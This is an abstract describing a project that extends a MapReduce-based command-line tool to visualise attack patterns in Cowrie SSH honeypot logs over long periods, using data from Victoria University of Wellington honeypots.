Longitudinal Analysis of SSH Honeypot Logs

Abstract

Visualising attacks and attack patterns from Cowrie SSH honeypots can be challenging when working and handling vast amounts of data over a long period of time. Difficulties can arise when handling complex log files from cowrie honeypots in a JSON format. However, it is important to be able to extract meaningful information to identify trends and patterns performed by attackers over a specified period. A command-line tool was developed using a MapReduce programming model to process large amounts of log data efficiently and in an acceptable timeframe. However, the current solution only visualises features extracted over a short timeframe. Gathering and capturing information over an extended timeline can help identify changes in attackers’ behaviour for specific periods, adding additional information to those already accessible aggregated data. The project applied captured data logs from multiple instances of Cowrie honeypots deployed by the cybersecurity team at Victoria University of Wellington (VUW) and used them to integrate a longitudinal analysis to visualise attack and attack patterns over a long period of time.